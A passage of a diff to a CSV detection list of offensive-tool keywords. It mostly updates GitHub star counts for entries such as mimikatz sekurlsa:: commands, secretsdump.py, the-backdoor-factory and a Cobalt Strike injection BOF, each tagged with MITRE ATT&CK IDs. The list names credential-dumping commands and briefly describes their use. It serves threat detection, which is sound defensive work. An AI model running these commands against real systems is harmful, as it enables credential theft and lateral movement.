exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*secretsdump.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" -"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*sec-shinject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*securesocketfunneling*","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*security-onion*","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3033","534","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" "*securitywithoutborders*","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SeeYouCM-Thief.git*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*SeeYouCM-Thief-main*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::tspkg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::wdigest*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 